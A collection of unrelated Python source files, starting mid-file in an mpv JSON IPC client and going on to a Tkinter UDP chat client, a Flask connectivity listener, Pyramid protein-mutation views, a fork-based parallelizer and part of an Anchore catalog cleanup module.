                        win32file.GENERIC_READ | win32file.GENERIC_WRITE,
                        0, None, win32file.OPEN_EXISTING, 0, None)
                    win32pipe.SetNamedPipeHandleState(self._sock,
                        1, # PIPE_NOWAIT
                        None, None)
                except pywintypes.error as err:
                    if err.args[0] == winerror.ERROR_FILE_NOT_FOUND:
                        # Pipe not created yet; keep retrying.
                        pass
                    else:
                        break
                else:
                    break
            else:
                # unix socket
                try:
                    self._sock = socket.socket(socket.AF_UNIX)
                    self._sock.connect(self._sock_filename)
                except (FileNotFoundError, ConnectionRefusedError):
                    self._sock.close()
                    continue
                else:
                    break
        else:
            raise MPVProcessError("unable to start process")
    def _stop_socket(self):
        """Clean up the socket.
        """
        if hasattr(self, "_sock"):
            self._sock.close()
        if hasattr(self, "_sock_filename"):
            try:
                os.remove(self._sock_filename)
            except OSError:
                pass
    def _prepare_thread(self):
        """Set up the queues for the communication threads.
        """
        # Size-1 request queue serializes request/response cycles.
        self._request_queue = Queue(1)
        self._response_queues = {}
        self._event_queue = Queue()
        self._stop_event = threading.Event()
    def _start_thread(self):
        """Start up the communication threads.
        """
        self._thread = threading.Thread(target=self._reader)
        self._thread.start()
    def _stop_thread(self):
        """Stop the communication threads.
        """
        if hasattr(self, "_stop_event"):
            self._stop_event.set()
        if hasattr(self, "_thread"):
            self._thread.join()
    def _reader(self):
        """Read the incoming json messages from the unix socket that is
           connected to the mpv process. Pass them on to the message handler.
        """
        buf = b""
        while not self._stop_event.is_set():
            if isWin:
                try:
                    (n, b) = win32file.ReadFile(self._sock, 4096)
                    buf += b
                except pywintypes.error as err:
                    if err.args[0] == winerror.ERROR_NO_DATA:
                        # Non-blocking pipe had nothing to read.
                        time.sleep(0.1)
                        continue
                    elif err.args[0] == winerror.ERROR_BROKEN_PIPE:
                        # mpv closed the pipe; stop reading.
                        return
                    else:
                        raise
            else:
                r, w, e = select.select([self._sock], [], [], 1)
                if r:
                    b = self._sock.recv(1024)
                    if not b:
                        break
                    buf += b
            # Messages are newline-delimited JSON; drain every complete
            # line currently in the buffer.
            newline = buf.find(b"\n")
            while newline >= 0:
                data = buf[:newline + 1]
                buf = buf[newline + 1:]
                if self.debug:
                    sys.stdout.write("<<< " + data.decode("utf8", "replace"))
                message = self._parse_message(data)
                self._handle_message(message)
                newline = buf.find(b"\n")
    #
    # Message handling
    #
    def _compose_message(self, message):
        """Return a json representation from a message dictionary.
        """
        # XXX may be strict is too strict ;-)
        data = json.dumps(message, separators=",:")
        return data.encode("utf8", "strict") + b"\n"
    def _parse_message(self, data):
        """Return a message dictionary from a json representation.
        """
        # XXX may be strict is too strict ;-)
        data = data.decode("utf8", "strict")
        return json.loads(data)
    def _handle_message(self, message):
        """Handle different types of incoming messages, i.e. responses to
           commands or asynchronous events.
        """
        if "error" in message:
            # This message is a reply to a request.
            try:
                thread_id = self._request_queue.get(timeout=1)
            except Empty:
                raise MPVCommunicationError("got a response without a pending request")
            self._response_queues[thread_id].put(message)
        elif "event" in message:
            # This message is an asynchronous event.
            self._event_queue.put(message)
        else:
            raise MPVCommunicationError("invalid message %r" % message)
    def _send_message(self, message, timeout=None):
        """Send a message/command to the mpv process, message must be a
           dictionary of the form {"command": ["arg1", "arg2", ...]}. Responses
           from the mpv process must be collected using _get_response().
        """
        data = self._compose_message(message)
        if self.debug:
            sys.stdout.write(">>> " + data.decode("utf8", "replace"))
        # Request/response cycles are coordinated across different threads, so
        # that they don't get mixed up. This makes it possible to use commands
        # (e.g. fetch properties) from event callbacks that run in a different
        # thread context.
        thread_id = self._thread_id()
        if thread_id not in self._response_queues:
            # Prepare a response queue for the thread to wait on.
            self._response_queues[thread_id] = Queue()
        # Put the id of the current thread on the request queue. This id is
        # later used to associate responses from the mpv process with this
        # request.
        try:
            self._request_queue.put(thread_id, block=True, timeout=timeout)
        except Full:
            raise MPVTimeoutError("unable to put request")
        # Write the message data to the socket.
        if isWin:
            win32file.WriteFile(self._sock, data)
        else:
            while data:
                size = self._sock.send(data)
                if size == 0:
                    raise MPVCommunicationError("broken sender socket")
                data = data[size:]
    def _get_response(self, timeout=None):
        """Collect the response message to a previous request. If there was an
           error a MPVCommandError exception is raised, otherwise the command
           specific data is returned.
        """
        try:
            message = self._response_queues[self._thread_id()].get(block=True, timeout=timeout)
        except Empty:
            raise MPVTimeoutError("unable to get response")
        if message["error"] != "success":
            raise MPVCommandError(message["error"])
        else:
            return message.get("data")
    def _get_event(self, timeout=None):
        """Collect a single event message that has been received out-of-band
           from the mpv process. If a timeout is specified and there have not
           been any events during that period, None is returned.
        """
        try:
            return self._event_queue.get(block=timeout is not None, timeout=timeout)
        except Empty:
            return None
    def _send_request(self, message, timeout=None):
        """Send a command to the mpv process and collect the result.
        """
        self.ensure_running()
        self._send_message(message, timeout)
        try:
            return self._get_response(timeout)
        except MPVCommandError as e:
            raise MPVCommandError("%r: %s" % (message["command"], e))
    #
    # Public API
    #
    def is_running(self):
        """Return True if the mpv process is still active.
        """
        return self._proc.poll() is None
    def ensure_running(self):
        """Restart mpv and the whole communication stack if the process died."""
        if not self.is_running():
            self._stop_thread()
            self._stop_process()
            self._stop_socket()
            self._prepare_socket()
            self._prepare_process()
            self._start_process()
            self._start_socket()
            self._prepare_thread()
            self._start_thread()
    def close(self):
        """Shutdown the mpv process and our communication setup.
        """
        if self.is_running():
            self._send_request({"command": ["quit"]}, timeout=1)
            self._stop_process()
        self._stop_thread()
        self._stop_socket()
        self._stop_process()
class MPV(MPVBase):
    """Class for communication with the mpv media player via unix socket
       based JSON IPC. It adds a few usable methods and a callback API.

       To automatically register methods as event callbacks, subclass this
       class and define specially named methods as follows:

           def on_file_loaded(self):
               # This is called for every 'file-loaded' event.
               ...

           def on_property_time_pos(self, position):
               # This is called whenever the 'time-pos' property is updated.
               ...

       Please note that callbacks are executed inside a separate thread. The
       MPV class itself is completely thread-safe. Requests from different
       threads to the same MPV instance are synchronized.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._callbacks = {}
        self._property_serials = {}
        # Monotonically increasing ids for observe_property registrations.
        self._new_serial = iter(range(sys.maxsize))
        # Enumerate all methods and auto-register callbacks for
        # events and property-changes.
        for method_name, method in inspect.getmembers(self):
            if not inspect.ismethod(method):
                continue
            if method_name.startswith("on_property_"):
                name = method_name[12:]
                name = name.replace("_", "-")
                self.register_property_callback(name, method)
            elif method_name.startswith("on_"):
                name = method_name[3:]
                name = name.replace("_", "-")
                self.register_callback(name, method)
        # Simulate an init event when the process and all callbacks have been
        # completely set up.
        if hasattr(self, "on_init"):
            self.on_init()
    #
    # Socket communication
    #
    def _start_thread(self):
        """Start up the communication threads.
        """
        super()._start_thread()
        self._event_thread = threading.Thread(target=self._event_reader)
        self._event_thread.start()
    def _stop_thread(self):
        """Stop the communication threads.
        """
        super()._stop_thread()
        if hasattr(self, "_event_thread"):
            self._event_thread.join()
    #
    # Event/callback API
    #
    def _event_reader(self):
        """Collect incoming event messages and call the event handler.
        """
        while not self._stop_event.is_set():
            message = self._get_event(timeout=1)
            if message is None:
                continue
            self._handle_event(message)
    def _handle_event(self, message):
        """Lookup and call the callbacks for a particular event message.
        """
        if message["event"] == "property-change":
            name = "property-" + message["name"]
        else:
            name = message["event"]
        for callback in self._callbacks.get(name, []):
            # Events may or may not carry a payload.
            if "data" in message:
                callback(message["data"])
            else:
                callback()
    def register_callback(self, name, callback):
        """Register a function `callback` for the event `name`.
        """
        try:
            self.command("enable_event", name)
        except MPVCommandError:
            raise MPVError("no such event %r" % name)
        self._callbacks.setdefault(name, []).append(callback)
    def unregister_callback(self, name, callback):
        """Unregister a previously registered function `callback` for the event
           `name`.
        """
        try:
            callbacks = self._callbacks[name]
        except KeyError:
            raise MPVError("no callbacks registered for event %r" % name)
        try:
            callbacks.remove(callback)
        except ValueError:
            raise MPVError("callback %r not registered for event %r" % (callback, name))
    def register_property_callback(self, name, callback):
        """Register a function `callback` for the property-change event on
           property `name`.
        """
        # Property changes are normally not sent over the connection unless they
        # are requested using the 'observe_property' command.
        # XXX We manually have to check for the existence of the property name.
        # Apparently observe_property does not check it :-(
        proplist = self.command("get_property", "property-list")
        if name not in proplist:
            raise MPVError("no such property %r" % name)
        self._callbacks.setdefault("property-" + name, []).append(callback)
        # 'observe_property' expects some kind of id which can be used later
        # for unregistering with 'unobserve_property'.
        serial = next(self._new_serial)
        self.command("observe_property", serial, name)
        self._property_serials[(name, callback)] = serial
        return serial
    def unregister_property_callback(self, name, callback):
        """Unregister a previously registered function `callback` for the
           property-change event on property `name`.
        """
        try:
            callbacks = self._callbacks["property-" + name]
        except KeyError:
            raise MPVError("no callbacks registered for property %r" % name)
        try:
            callbacks.remove(callback)
        except ValueError:
            raise MPVError("callback %r not registered for property %r" % (callback, name))
        serial = self._property_serials.pop((name, callback))
        self.command("unobserve_property", serial)
    #
    # Public API
    #
    def command(self, *args, timeout=1):
        """Execute a single command on the mpv process and return the result.
        """
        return self._send_request({"command": list(args)}, timeout=timeout)
    def get_property(self, name):
        """Return the value of property `name`.
        """
        return self.command("get_property", name)
    def set_property(self, name, value):
        """Set the value of property `name`.
        """
        return self.command("set_property", name, value)
|
client.py | import socket
import threading
from Tkinter import Tk, Entry, Frame, StringVar, Scrollbar, Listbox, END, X, BOTTOM, Y, RIGHT, LEFT, BOTH
from random import randint
def receive_data(sock):
    """Background thread: append every datagram received on `sock` to the
    chat listbox (module-level `msg_list`).

    Returns (ending the thread) once the socket raises OSError, e.g. when
    it is closed on shutdown. The previous `continue` on OSError made the
    loop spin forever on a dead socket, pegging a CPU core.
    """
    while True:
        try:
            data, addr = sock.recvfrom(4096)
        except OSError:
            # Socket closed or unusable — stop the receiver thread.
            return
        if data:
            msg_list.insert(END, '%s\n' % data)
def enter_pressed(event):
    """Send the contents of the input field to the chat server, prefixed
    with the chosen nickname, then clear the field."""
    global sock
    message = input_field.get()
    sender = name_field.get()
    if message:
        sock.sendto("{}: {}".format(sender, message), server_host)
        input_user.set('')
    return
# --- UDP chat client setup (note: Tkinter import above implies Python 2) ---
server_host = ('127.0.0.1', 5000)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to an ephemeral local port so the server can reply to us.
sock.bind(('', 0))
# Announce ourselves to the server with a dummy datagram.
sock.sendto(" ", server_host)
# Receiver runs in the background and fills the listbox.
threading.Thread(target=receive_data, args=(sock,)).start()
root = Tk()
root.title("Tkinter Chat")
messages_frame = Frame(root)
scrollbar = Scrollbar(messages_frame)
msg_list = Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=RIGHT, fill=Y)
msg_list.pack(side=LEFT, fill=BOTH)
msg_list.pack()
messages_frame.pack()
# Nickname entry, pre-filled with a random guest name.
input_name = StringVar()
name_field = Entry(root, text=input_name)
name_field.insert(0, 'Guest' + str(randint(1000, 9999)))
name_field.pack()
# Message entry; <Return> sends the current text.
input_user = StringVar()
input_field = Entry(root, text=input_user)
input_field.pack(side=BOTTOM, fill=X)
frame = Frame(root)
input_field.bind("<Return>", enter_pressed)
frame.pack()
root.mainloop()
|
http_listener.py | #!/usr/bin/env python3
import swimlane_environment_validator.lib.config as config
import swimlane_environment_validator.lib.log_handler as log_handler
from threading import Thread
from flask import Flask
import click
import ssl
from OpenSSL import crypto, SSL
logger = log_handler.setup_logger()
# Module-level app is shadowed by the per-thread Flask instances created in
# serve_on_port(); kept here for importers that expect it.
app = Flask(__name__)
def serve_on_port(port):
    """Start a catch-all HTTPS listener on `port` (blocking).

    Intended to run in a daemon thread: every path returns a static JSON
    "ok" payload so load balancers / cluster peers can verify connectivity.
    Errors while binding are logged, not raised.
    """
    logger.info("Starting http listener on {}...".format(port))
    # Each thread gets its own Flask app so routes/ports don't collide.
    app = Flask(__name__)

    @app.route('/', defaults={'path': ''})
    @app.route('/<path:path>')
    def catch_all(path):
        return '{ "status" : "ok" }'

    # Silence the Flask development server logging unless debugging.
    # (Fixed non-idiomatic `== False` comparison, PEP 8 E712.)
    if not config.arguments.debug:
        def secho(text, file=None, nl=None, err=None, color=None, **styles):
            pass

        def echo(text, file=None, nl=None, err=None, color=None, **styles):
            pass

        click.echo = echo
        click.secho = secho
    try:
        # 'adhoc' generates a throwaway self-signed certificate.
        app.run(host='0.0.0.0', port=port, ssl_context='adhoc')
    except Exception:
        logger.error('Couldnt start listener on port {}, is something already listening? Ports below 1024 can only be spawned by root.'.format(port))
        logger.debug("Caught exception while starting listener thread ", exc_info=True)
def start_lb_listener_threads():
    """Spawn one daemon listener thread per load-balancer connectivity port."""
    for port in config.LB_CONNECTIVITY_PORTS:
        worker = Thread(target=serve_on_port, args=[port])
        worker.daemon = True
        worker.start()
def start_intra_cluster_listener_threads():
    """Spawn one daemon listener thread per intra-cluster port."""
    for cluster_port in config.INTRA_CLUSTER_PORTS:
        worker = Thread(target=serve_on_port, args=[cluster_port])
        worker.daemon = True
        worker.start()
|
ajax.py |
@view_config(route_name='gene_check', renderer="json")
def gene_check_view(request):
    """
    This is the first one that gets called. It starts a series of parallel jobs, whose IDs are stored in request.session['threads'].
    :param request:
    :return: {'uniprot_name': ...} on success, {'error': 'Not found'} otherwise.
    """
    print(request.POST)
    if request.POST['gene'] in namedex:
        # namedex maps gene names to uniprot accessions; genedex the reverse.
        uniprot = namedex[request.POST['gene']]
        gene_name = genedex[uniprot]
        request.session['gene_name'] = gene_name
        ### if there is already a pickle file...
        if os.path.isfile(os.path.join('data', 'pickle', uniprot + '.p')):
            ### if there is already a pickle file...
            request.session['threads'] = dict() ## this is an odd case.
        else:
            # Kick off background parsing; keep thread-name -> task-name map
            # in the session so task_check can poll progress.
            (variant, threads) = parallel_parse_protein(uniprot=uniprot, gene_name=gene_name, return_complete=False)
            request.session['threads'] = {fn.name: tn for tn, fn in threads.items()}
            saver = threading.Thread(target=save_factory(variant, threads, request))
            saver.start()
        request.session['uniprot'] = uniprot
        # request.session['data'] = {} ### does not work!!!
        return {'uniprot_name': uniprot}
    else:
        return {'error': 'Not found'}
@view_config(route_name='mut_check', renderer="json")
def mut_check_view(request):
    """
    Validate a proposed mutation against the session's protein sequence.

    Absolutely no storing of the mutation data or else it might get pickled.
    :param request:
    :return: {'valid': 1} when the mutation fits the sequence, otherwise an
        {'error': ...} payload.
    """
    try:
        variant = Protein()
        variant.sequence = seqdex[request.session['uniprot']]
        mutation = Mutation(request.POST['mutation'])
        if variant.check_mutation(mutation):
            return {'valid': 1}
        else:
            return {'error': variant.msg_error_sequence(variant.sequence)}
    except Exception as err:
        print(err)
        return {'error': str(err)}
    # NOTE: an unreachable block (every path above returns) referencing the
    # undefined names `uniprot` and `protein` used to follow here; removed
    # as dead code.
@view_config(route_name='task_check', renderer="json")
def status_check_view(request):
    """Report which of this session's background parsing threads are still running.

    :return: {'status': [descriptions], 'unfinished': count} or an error dict
        when no job was ever started for this session.
    """
    if 'threads' not in request.session:
        return {'error': 'No job found'}
    known = request.session['threads']
    # A thread is unfinished while its name still shows up in the live set.
    unfinished = [t.name for t in threading.enumerate() if t.name in known.keys()]
    status = [descr for name, descr in known.items() if name in unfinished]
    return {'status': status, 'unfinished': len(status)}
@view_config(route_name='get_results', renderer="../templates/results.mako") # default mako renderer giving me problems.
def get_results_view(request):
    """Load the pickled Protein for the session's uniprot, apply the posted
    mutation and predict its effect for rendering."""
    variant = Protein.load('data/pickle/' + request.session['uniprot'] + '.p')
    # The mutation is parsed here (after loading) so it never gets pickled.
    variant.parse_mutation(request.POST['mutation'])
    variant.predict_effect()
    return {'variant': variant}
############################ DEPRACATION IN PROGTRSS
# @view_config(route_name='get_results', renderer="../templates/results.mako") # default mako renderer giving me problems.
def old_get_results_view(request):
    """Deprecated predecessor of get_results_view, kept for reference.

    NOTE(review): this uses `Variant` where the live views use `Protein`;
    `Variant` does not appear to be defined in the visible code — confirm it
    is imported before ever re-enabling this route.
    """
    variant = Variant.load('data/pickle/' + request.session['uniprot'] + '.p')
    variant.parse_mutation(request.POST['mutation']) ## added here like this to avoid it getting saved.
    variant.predict_effect()
    return {'variant': variant}
#### TODO move out once complte.
def parallel_parse_protein(uniprot, gene_name, return_complete=True):
    """
    Parallel version of the protein fetcher; handles the non-mutation parts.

    :param uniprot: uniprot accession to fetch.
    :param gene_name: gene name for the record.
    :param return_complete: when True, join all worker threads and return the
        finished Protein; when False, return immediately with
        (Protein, {task_name: Thread}) so the caller can track progress.
    :return: Protein, or a (Protein, threads) tuple when return_complete is False.
    """
    protein = Protein()
    protein.verbose = True  # for now.
    protein.from_pickle = False
    protein.uniprot = uniprot
    protein.gene = gene_name
    tasks = {'Uniprot': protein.parse_uniprot}
    workers = {}
    for task_name, task_fn in tasks.items():
        worker = threading.Thread(target=task_fn)
        worker.start()
        workers[task_name] = worker
    if not return_complete:
        return (protein, workers)
    for worker in workers.values():
        worker.join()
    return protein
def save_factory(variant, threads, request):
    """
    Build a closure that waits for all parser threads to finish, then pickles
    the variant. The mutation fields are reset to a neutral placeholder first
    so no real mutation data is ever persisted.

    :param variant: the Protein/variant object to dump.
    :param threads: mapping of task name -> Thread to join before dumping.
    :param request: the originating request (currently unused by the closure).
    :return: a zero-argument callable suitable as a Thread target.
    """
    def saver():
        for worker in threads.values():
            worker.join()
        # Neutral placeholder mutation (M1M, a no-op).
        variant.resi = 1
        variant.to_resn = 'M'
        variant.from_resn = 'M'
        variant.dump('data/pickle/' + variant.uniprot + '.p')
    return saver
|
parallelizer.py | # -*- coding: utf-8 -*-
import os, sys, time, multiprocessing, re
from .processes import ForkedProcess
from .remoteproxy import ClosedError
from ..python2_3 import basestring, xrange
class CanceledError(Exception):
    """Raised when the progress dialog is canceled during a processing operation."""
class Parallelize(object):
    """
    Class for ultra-simple inline parallelization on multi-core CPUs

    Example::

        ## Here is the serial (single-process) task:
        tasks = [1, 2, 4, 8]
        results = []
        for task in tasks:
            result = processTask(task)
            results.append(result)
        print(results)

        ## Here is the parallelized version:
        tasks = [1, 2, 4, 8]
        results = []
        with Parallelize(tasks, workers=4, results=results) as tasker:
            for task in tasker:
                result = processTask(task)
                tasker.results.append(result)
        print(results)

    The only major caveat is that *result* in the example above must be picklable,
    since it is automatically sent via pipe back to the parent process.
    """
    def __init__(self, tasks=None, workers=None, block=True, progressDialog=None, randomReseed=True, **kwds):
        """
        ===============  ===================================================================
        **Arguments:**
        tasks            list of objects to be processed (Parallelize will determine how to
                         distribute the tasks). If unspecified, then each worker will receive
                         a single task with a unique id number.
        workers          number of worker processes or None to use number of CPUs in the
                         system
        progressDialog   optional dict of arguments for ProgressDialog
                         to update while tasks are processed
        randomReseed     If True, each forked process will reseed its random number generator
                         to ensure independent results. Works with the built-in random
                         and numpy.random.
        kwds             objects to be shared by proxy with child processes (they will
                         appear as attributes of the tasker)
        ===============  ===================================================================
        """
        ## Generate progress dialog.
        ## Note that we want to avoid letting forked child processes play with progress dialogs..
        self.showProgress = False
        if progressDialog is not None:
            self.showProgress = True
            if isinstance(progressDialog, basestring):
                progressDialog = {'labelText': progressDialog}
            from ..widgets.ProgressDialog import ProgressDialog
            self.progressDlg = ProgressDialog(**progressDialog)
        if workers is None:
            workers = self.suggestedWorkerCount()
        # Forking is the parallelization mechanism; without os.fork (e.g. on
        # Windows) fall back to serial execution.
        if not hasattr(os, 'fork'):
            workers = 1
        self.workers = workers
        if tasks is None:
            tasks = range(workers)
        self.tasks = list(tasks)
        self.reseed = randomReseed
        self.kwds = kwds.copy()
        # The tasker calls this back (via proxy in children) to report progress.
        self.kwds['_taskStarted'] = self._taskStarted

    def __enter__(self):
        """Enter the with-block: fork workers (or run serially) and return a Tasker."""
        self.proc = None
        if self.workers == 1:
            return self.runSerial()
        else:
            return self.runParallel()

    def __exit__(self, *exc_info):
        """Exit handler. In a forked worker this hard-exits the process with an
        appropriate exit code; in the parent it only tears down the dialog."""
        if self.proc is not None:  ## worker
            exceptOccurred = exc_info[0] is not None ## hit an exception during processing.
            try:
                if exceptOccurred:
                    sys.excepthook(*exc_info)
            finally:
                #print os.getpid(), 'exit'
                # os._exit skips normal interpreter shutdown -- required after
                # fork so the child never runs the parent's cleanup handlers.
                os._exit(1 if exceptOccurred else 0)
        else:  ## parent
            if self.showProgress:
                try:
                    self.progressDlg.__exit__(None, None, None)
                except Exception:
                    pass

    def runSerial(self):
        """Single-process fallback: return a Tasker over all tasks in this process."""
        if self.showProgress:
            self.progressDlg.__enter__()
            self.progressDlg.setMaximum(len(self.tasks))
        self.progress = {os.getpid(): []}
        return Tasker(self, None, self.tasks, self.kwds)

    def runParallel(self):
        """Fork worker processes, hand each a chunk of tasks, and (in the
        parent) poll the children until all have exited.

        In a child this returns that child's Tasker; in the parent it returns
        an empty list (the parent processes no tasks itself).
        """
        self.childs = []
        ## break up tasks into one set per worker
        workers = self.workers
        chunks = [[] for i in xrange(workers)]
        i = 0
        for i in range(len(self.tasks)):
            chunks[i%workers].append(self.tasks[i])
        ## fork and assign tasks to each worker
        for i in range(workers):
            proc = ForkedProcess(target=None, preProxy=self.kwds, randomReseed=self.reseed)
            if not proc.isParent:
                # We are inside the forked child: return its task list now.
                self.proc = proc
                return Tasker(self, proc, chunks[i], proc.forkedProxies)
            else:
                self.childs.append(proc)
        ## Keep track of the progress of each worker independently.
        self.progress = dict([(ch.childPid, []) for ch in self.childs])
        ## for each child process, self.progress[pid] is a list
        ## of task indexes. The last index is the task currently being
        ## processed; all others are finished.
        try:
            if self.showProgress:
                self.progressDlg.__enter__()
                self.progressDlg.setMaximum(len(self.tasks))
            ## process events from workers until all have exited.
            activeChilds = self.childs[:]
            self.exitCodes = []
            pollInterval = 0.01
            while len(activeChilds) > 0:
                waitingChildren = 0
                rem = []
                for ch in activeChilds:
                    try:
                        n = ch.processRequests()
                        if n > 0:
                            waitingChildren += 1
                    except ClosedError:
                        #print ch.childPid, 'process finished'
                        rem.append(ch)
                        if self.showProgress:
                            self.progressDlg += 1
                #print "remove:", [ch.childPid for ch in rem]
                for ch in rem:
                    activeChilds.remove(ch)
                    # Reap the child; retry when waitpid is interrupted by a
                    # signal (errno 4 == EINTR).
                    while True:
                        try:
                            pid, exitcode = os.waitpid(ch.childPid, 0)
                            self.exitCodes.append(exitcode)
                            break
                        except OSError as ex:
                            if ex.errno == 4:  ## If we get this error, just try again
                                continue
                                #print "Ignored system call interruption"
                            else:
                                raise
                #print [ch.childPid for ch in activeChilds]
                if self.showProgress and self.progressDlg.wasCanceled():
                    for ch in activeChilds:
                        ch.kill()
                    raise CanceledError()
                ## adjust polling interval--prefer to get exactly 1 event per poll cycle.
                if waitingChildren > 1:
                    pollInterval *= 0.7
                elif waitingChildren == 0:
                    pollInterval /= 0.7
                pollInterval = max(min(pollInterval, 0.5), 0.0005)  ## but keep it within reasonable limits
                time.sleep(pollInterval)
        finally:
            if self.showProgress:
                self.progressDlg.__exit__(None, None, None)
            for ch in self.childs:
                ch.join()
        if len(self.exitCodes) < len(self.childs):
            raise Exception("Parallelizer started %d processes but only received exit codes from %d." % (len(self.childs), len(self.exitCodes)))
        for code in self.exitCodes:
            if code != 0:
                raise Exception("Error occurred in parallel-executed subprocess (console output may have more information).")
        return []  ## no tasks for parent process.

    @staticmethod
    def suggestedWorkerCount():
        """Suggest a worker count: on Linux, count physical cores from
        /proc/cpuinfo (skipping hyperthreads); otherwise cpu_count()."""
        if 'linux' in sys.platform:
            ## I think we can do a little better here..
            ## cpu_count does not consider that there is little extra benefit to using hyperthreaded cores.
            try:
                cores = {}
                pid = None
                with open('/proc/cpuinfo') as fd:
                    for line in fd:
                        m = re.match(r'physical id\s+:\s+(\d+)', line)
                        if m is not None:
                            pid = m.groups()[0]
                        m = re.match(r'cpu cores\s+:\s+(\d+)', line)
                        if m is not None:
                            cores[pid] = int(m.groups()[0])
                return sum(cores.values())
            except:
                return multiprocessing.cpu_count()
        else:
            return multiprocessing.cpu_count()

    def _taskStarted(self, pid, i, **kwds):
        """Progress callback: worker *pid* has started task index *i*."""
        ## called remotely by tasker to indicate it has started working on task i
        #print pid, 'reported starting task', i
        if self.showProgress:
            if len(self.progress[pid]) > 0:
                self.progressDlg += 1
            if pid == os.getpid():  ## single-worker process
                if self.progressDlg.wasCanceled():
                    raise CanceledError()
        self.progress[pid].append(i)
class Tasker(object):
    """Iterable handed to each worker by Parallelize; yields that worker's
    share of the tasks.

    Keyword objects given to Parallelize become attributes of the tasker so
    workers can reach shared (proxied) state.
    """
    def __init__(self, parallelizer, process, tasks, kwds):
        self.proc = process
        self.par = parallelizer
        self.tasks = tasks
        for name, obj in kwds.items():
            setattr(self, name, obj)

    def __iter__(self):
        ## tasks could instead be pulled from the parent one at a time..
        idx = 0
        for task in self.tasks:
            self.index = idx
            # Report progress back to the parent without waiting for a reply.
            self._taskStarted(os.getpid(), idx, _callSync='off')
            yield task
            idx += 1
        if self.proc is not None:
            # All tasks done in a forked worker: close the pipe to the parent.
            self.proc.close()

    def process(self):
        """
        Process requests from parent.
        Usually it is not necessary to call this unless you would like to
        receive messages (such as exit requests) during an iteration.
        """
        if self.proc is not None:
            self.proc.processRequests()

    def numWorkers(self):
        """
        Return the number of parallel workers
        """
        return self.par.workers
#class Parallelizer:
#"""
#Use::
#p = Parallelizer()
#with p(4) as i:
#p.finish(do_work(i))
#print p.results()
#"""
#def __init__(self):
#pass
#def __call__(self, n):
#self.replies = []
#self.conn = None ## indicates this is the parent process
#return Session(self, n)
#def finish(self, data):
#if self.conn is None:
#self.replies.append((self.i, data))
#else:
##print "send", self.i, data
#self.conn.send((self.i, data))
#os._exit(0)
#def result(self):
#print self.replies
#class Session:
#def __init__(self, par, n):
#self.par = par
#self.n = n
#def __enter__(self):
#self.childs = []
#for i in range(1, self.n):
#c1, c2 = multiprocessing.Pipe()
#pid = os.fork()
#if pid == 0: ## child
#self.par.i = i
#self.par.conn = c2
#self.childs = None
#c1.close()
#return i
#else:
#self.childs.append(c1)
#c2.close()
#self.par.i = 0
#return 0
#def __exit__(self, *exc_info):
#if exc_info[0] is not None:
#sys.excepthook(*exc_info)
#if self.childs is not None:
#self.par.replies.extend([conn.recv() for conn in self.childs])
#else:
#self.par.finish(None)
|
__init__.py | import json
import os
import copy
import threading
import time
import pkg_resources
from sqlalchemy.exc import IntegrityError
# anchore modules
import anchore_engine.clients.anchoreio
import anchore_engine.common.helpers
import anchore_engine.common.images
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services import simplequeue
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.clients.services.common
from anchore_engine.clients import docker_registry
from anchore_engine import db
from anchore_engine.db import db_catalog_image, db_policybundle, db_queues, db_registries, db_subscriptions, \
db_accounts, db_anchore, db_services, db_events, AccountStates, AccountTypes, ArchiveTransitionRule
from anchore_engine.subsys import notifications, taskstate, logger, archive, object_store
from anchore_engine.services.catalog import catalog_impl
import anchore_engine.subsys.events as events
from anchore_engine.utils import AnchoreException
from anchore_engine.services.catalog.exceptions import TagManifestParseError, TagManifestNotFoundError, PolicyBundleValidationError
from anchore_engine.service import ApiService, LifeCycleStages
from anchore_engine.common.helpers import make_policy_record
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.services.catalog import archiver
from anchore_engine.subsys.object_store.config import DEFAULT_OBJECT_STORE_MANAGER_ID, ANALYSIS_ARCHIVE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY
##########################################################
# monitor section
def do_user_resources_delete(userId):
    """
    Delete all resources owned by the given account, one resource type at a
    time (subscriptions, registries, evaluations, policy bundles, images,
    archive metadata).

    A failure for one resource type is logged and skipped so the others still
    run; the caller (monitor) retries on its next cycle.

    :param userId: account name whose resources are to be removed.
    :return: (summary_dict, 200) where summary_dict holds per-type totals,
        per-type deletion counts, plus 'all_total' and 'all_deleted'.
    """
    return_object = {}
    resourcemaps = [
        ("subscriptions", db.db_subscriptions.get_all_byuserId, catalog_impl.do_subscription_delete),
        ("registries", db.db_registries.get_byuserId, catalog_impl.do_registry_delete),
        ("evaluations", db.db_policyeval.get_all_byuserId, catalog_impl.do_evaluation_delete),
        ("policybundles", db.db_policybundle.get_all_byuserId, catalog_impl.do_policy_delete),
        ("images", db.db_catalog_image.get_all_byuserId, catalog_impl.do_image_delete),
        ("archive", db.db_archivemetadata.list_all_byuserId, catalog_impl.do_archive_delete),
    ]
    limit = 2048  # max records fetched per resource type per cycle
    all_total = 0
    all_deleted = 0
    for resourcename, getfunc, delfunc in resourcemaps:
        try:
            total = 0
            deleted = 0
            with db.session_scope() as dbsession:
                records = getfunc(userId, session=dbsession, limit=limit)
                total = len(records)
                for record in records:
                    delfunc(userId, record, dbsession, force=True)
                    deleted += 1
            return_object['total_{}'.format(resourcename)] = total
            return_object['total_{}_deleted'.format(resourcename)] = deleted
            all_total += total
            all_deleted += deleted
            if total or deleted:
                logger.debug("deleted {} / {} {} records for user {}".format(deleted, total, resourcename, userId))
        except Exception as err:
            logger.warn("failed to delete resources in {} for user {}, will continue and try again - exception: {}".format(resourcename, userId, err))
    return_object['all_total'] = all_total
    return_object['all_deleted'] = all_deleted
    httpcode = 200
    return (return_object, httpcode)
def handle_account_resource_cleanup(*args, **kwargs):
    """
    Monitor task: for every account in the 'deleting' state, clean up its
    resources; once an account has nothing left, delete the account record
    itself. Progress is reported via the standard monitor metrics summary.
    """
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    start_time = time.time()
    logger.debug("FIRING: " + str(watcher))
    try:
        with db.session_scope() as dbsession:
            mgr = manager_factory.for_session(dbsession)
            accounts = mgr.list_accounts(with_state=AccountStates.deleting, include_service=False)
            for account in accounts:
